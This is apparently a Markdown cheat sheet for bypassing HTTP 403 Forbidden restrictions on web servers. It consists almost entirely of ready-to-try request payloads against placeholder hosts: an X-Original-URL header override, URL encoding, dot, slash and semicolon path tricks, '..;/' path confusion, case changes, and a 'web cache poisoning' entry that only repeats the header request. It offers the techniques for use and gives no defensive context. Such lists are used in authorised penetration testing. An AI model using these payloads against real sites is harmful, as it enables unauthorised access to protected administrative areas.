67 lines
1.1 KiB
Markdown
67 lines
1.1 KiB
Markdown
# Bypass 403 (Forbidden)
|
||
### Using `X-Original-URL` header
|
||
```bash
|
||
# Normal Request (403)
|
||
GET /admin HTTP/1.1
|
||
Host: target.com
|
||
|
||
# Try this to bypass (200)
|
||
GET /anything HTTP/1.1
|
||
Host: target.com
|
||
X-Original-URL: /admin
|
||
```
|
||
|
||
### Appending `%2e` after the first slash
|
||
```bash
|
||
# Normal Request (403)
|
||
http://target.com/admin
|
||
|
||
# Try this to bypass (200)
|
||
http://target.com/%2e/admin
|
||
```
|
||
### Try add dot `.` slash `/` and semicolon `;` in the URL
|
||
```bash
|
||
# Normal Request (403)
|
||
http://target.com/admin
|
||
|
||
# Try this to bypass (200)
|
||
http://target.com/secret/.
|
||
http://target.com//secret//
|
||
http://target.com/./secret/..
|
||
http://target.com/;/secret
|
||
http://target.com/.;/secret
|
||
http://target.com//;//secret
|
||
```
|
||
### Add `..;/` after the directory name
|
||
```bash
|
||
# Normal Request (403)
|
||
http://target.com/admin
|
||
|
||
# Try this to bypass (200)
|
||
http://target.com/admin..;/
|
||
```
|
||
### Try to uppercase the alphabet in the url
|
||
```bash
|
||
# Normal Request (403)
|
||
http://target.com/admin
|
||
|
||
# Try this to bypass (200)
|
||
http://target.com/aDmIN
|
||
```
|
||
|
||
## Via Web Cache Poisoning
|
||
```bash
|
||
GET /anything HTTP/1.1
|
||
Host: victim.com
|
||
X-Original-URL: /admin
|
||
```
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|